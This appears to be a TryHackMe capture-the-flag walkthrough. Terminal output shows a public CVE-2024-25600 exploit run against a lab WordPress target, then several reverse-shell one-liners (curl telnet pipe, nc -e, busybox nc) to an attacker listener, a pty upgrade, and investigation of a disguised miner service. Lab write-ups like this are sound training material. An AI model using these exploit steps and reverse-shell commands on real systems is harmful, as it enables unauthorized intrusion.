Collecting about-time==4.2.1 (from alive_progress->-r requirements.txt (line 1))
Downloading about_time-4.2.1-py3-none-any.whl.metadata (13 kB)
Collecting grapheme==0.6.0 (from alive_progress->-r requirements.txt (line 1))
Downloading grapheme-0.6.0.tar.gz (207 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 207.3/207.3 kB 14.0 kB/s eta 0:00:00
Installing build dependencies ... done
Getting requirements to build wheel ... done
Installing backend dependencies ... done
Preparing metadata (pyproject.toml) ... done
Collecting beautifulsoup4 (from bs4->-r requirements.txt (line 2))
Downloading beautifulsoup4-4.12.3-py3-none-any.whl.metadata (3.8 kB)
Collecting wcwidth (from prompt_toolkit->-r requirements.txt (line 3))
Downloading wcwidth-0.2.13-py2.py3-none-any.whl.metadata (14 kB)
Collecting charset-normalizer<4,>=2 (from requests->-r requirements.txt (line 4))
Downloading charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (33 kB)
Collecting idna<4,>=2.5 (from requests->-r requirements.txt (line 4))
Downloading idna-3.7-py3-none-any.whl.metadata (9.9 kB)
Collecting urllib3<3,>=1.21.1 (from requests->-r requirements.txt (line 4))
Downloading urllib3-2.2.1-py3-none-any.whl.metadata (6.4 kB)
Collecting certifi>=2017.4.17 (from requests->-r requirements.txt (line 4))
Downloading certifi-2024.2.2-py3-none-any.whl.metadata (2.2 kB)
Collecting markdown-it-py>=2.2.0 (from rich->-r requirements.txt (line 5))
Downloading markdown_it_py-3.0.0-py3-none-any.whl.metadata (6.9 kB)
Collecting pygments<3.0.0,>=2.13.0 (from rich->-r requirements.txt (line 5))
Downloading pygments-2.17.2-py3-none-any.whl.metadata (2.6 kB)
Collecting mdurl~=0.1 (from markdown-it-py>=2.2.0->rich->-r requirements.txt (line 5))
Downloading mdurl-0.1.2-py3-none-any.whl.metadata (1.6 kB)
Collecting soupsieve>1.2 (from beautifulsoup4->bs4->-r requirements.txt (line 2))
Downloading soupsieve-2.5-py3-none-any.whl.metadata (4.7 kB)
Downloading alive_progress-3.1.5-py3-none-any.whl (75 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 76.0/76.0 kB 17.6 kB/s eta 0:00:00
Downloading about_time-4.2.1-py3-none-any.whl (13 kB)
Downloading bs4-0.0.2-py2.py3-none-any.whl (1.2 kB)
Downloading prompt_toolkit-3.0.43-py3-none-any.whl (386 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 386.1/386.1 kB 23.7 kB/s eta 0:00:00
Downloading requests-2.31.0-py3-none-any.whl (62 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 62.6/62.6 kB 24.0 kB/s eta 0:00:00
Downloading rich-13.7.1-py3-none-any.whl (240 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 240.7/240.7 kB 16.7 kB/s eta 0:00:00
Downloading certifi-2024.2.2-py3-none-any.whl (163 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 163.8/163.8 kB 12.8 kB/s eta 0:00:00
Downloading charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (140 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 140.3/140.3 kB 18.8 kB/s eta 0:00:00
Downloading idna-3.7-py3-none-any.whl (66 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 66.8/66.8 kB 18.3 kB/s eta 0:00:00
Downloading markdown_it_py-3.0.0-py3-none-any.whl (87 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 87.5/87.5 kB 23.3 kB/s eta 0:00:00
Downloading pygments-2.17.2-py3-none-any.whl (1.2 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 MB 18.2 kB/s eta 0:00:00
Downloading urllib3-2.2.1-py3-none-any.whl (121 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 121.1/121.1 kB 16.1 kB/s eta 0:00:00
Downloading beautifulsoup4-4.12.3-py3-none-any.whl (147 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 147.9/147.9 kB 18.6 kB/s eta 0:00:00
Downloading wcwidth-0.2.13-py2.py3-none-any.whl (34 kB)
Downloading mdurl-0.1.2-py3-none-any.whl (10.0 kB)
Downloading soupsieve-2.5-py3-none-any.whl (36 kB)
Building wheels for collected packages: grapheme
Building wheel for grapheme (pyproject.toml) ... done
Created wheel for grapheme: filename=grapheme-0.6.0-py3-none-any.whl size=210078 sha256=fbdc53ce28a739bd023fe2fa13724076906e82c58d137536e74b64655a175a8d
Stored in directory: /home/kali/.cache/pip/wheels/ee/3b/0b/1b865800e916d671a24028d884698674138632a83fdfad4926
Successfully built grapheme
Installing collected packages: wcwidth, grapheme, urllib3, soupsieve, pygments, prompt_toolkit, mdurl, idna, charset-normalizer, certifi, about-time, requests, markdown-it-py, beautifulsoup4, alive_progress, rich, bs4
Successfully installed about-time-4.2.1 alive_progress-3.1.5 beautifulsoup4-4.12.3 bs4-0.0.2 certifi-2024.2.2 charset-normalizer-3.3.2 grapheme-0.6.0 idna-3.7 markdown-it-py-3.0.0 mdurl-0.1.2 prompt_toolkit-3.0.43 pygments-2.17.2 requests-2.31.0 rich-13.7.1 soupsieve-2.5 urllib3-2.2.1 wcwidth-0.2.13
┌──(venv)─(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ python exploit.py -u https://bricks.thm
[*] Nonce found: 964a6e9b87
[+] https://bricks.thm is vulnerable to CVE-2024-25600. Command output: apache
[!] Shell is ready, please type your commands UwU
# whoami
apache
# C='curl -Ns telnet://10.11.85.12:9001'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null
[-] No valid response received or target not vulnerable.
# whoami
apache
# nc 10.11.85.12 9001 -e sh
[-] No valid response received or target not vulnerable.
# busybox nc 10.11.85.12 9001 -e sh
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.239.202] 55846
whoami
apache
python -c 'import pty;pty.spawn("/bin/bash")'
apache@tryhackme:/data/www/default$
We are supposed to find the name of a suspicious process. ps aux does not give any useful information. However, if we list the services, we find it (grepping because the full output is too large):
apache@tryhackme:/data/www/default$ systemctl | grep TRYHACK
systemctl | grep TRYHACK
ubuntu.service loaded active running TRYHACK3M
The above outputs the name of a service, not the process that is executed by this service:
apache@tryhackme:/data/www/default$ systemctl status ubuntu.service
systemctl status ubuntu.service
● ubuntu.service - TRYHACK3M
Loaded: loaded (/etc/systemd/system/ubuntu.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2024-05-04 07:42:43 UTC; 3min 27s ago
Main PID: 2739 (nm-inet-dialog)
Tasks: 2 (limit: 4671)
Memory: 30.6M
CGroup: /system.slice/ubuntu.service
├─2739 /lib/NetworkManager/nm-inet-dialog
└─2740 /lib/NetworkManager/nm-inet-dialog
apache@tryhackme:/lib/NetworkManager$ systemctl list-unit-files ubuntu.service
<rkManager$ systemctl list-unit-files ubuntu.service
UNIT FILE STATE VENDOR PRESET
ubuntu.service enabled enabled
1 unit files listed.
apache@tryhackme:/lib/NetworkManager$ ls
ls
VPN nm-dispatcher nm-openvpn-service
conf.d nm-iface-helper nm-openvpn-service-openvpn-helper
dispatcher.d nm-inet-dialog nm-pptp-auth-dialog
inet.conf nm-initrd-generator nm-pptp-service
nm-dhcp-helper nm-openvpn-auth-dialog system-connections
apache@tryhackme:/lib/NetworkManager$ head inet.conf
head inet.conf
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
2024-04-08 10:46:08,745 [*] Miner()
2024-04-08 10:46:08,745 [*] Bitcoin Miner Thread Started
2024-04-08 10:46:08,745 [*] Status: Mining!
2024-04-08 10:46:10,747 [*] Miner()
2024-04-08 10:46:12,748 [*] Miner()
2024-04-08 10:46:14,751 [*] Miner()
2024-04-08 10:46:16,753 [*] Miner()
apache@tryhackme:/lib/NetworkManager$
If we search for the RCE vulnerability we found, we can see that Rapid7 has already added an exploit module to Metasploit: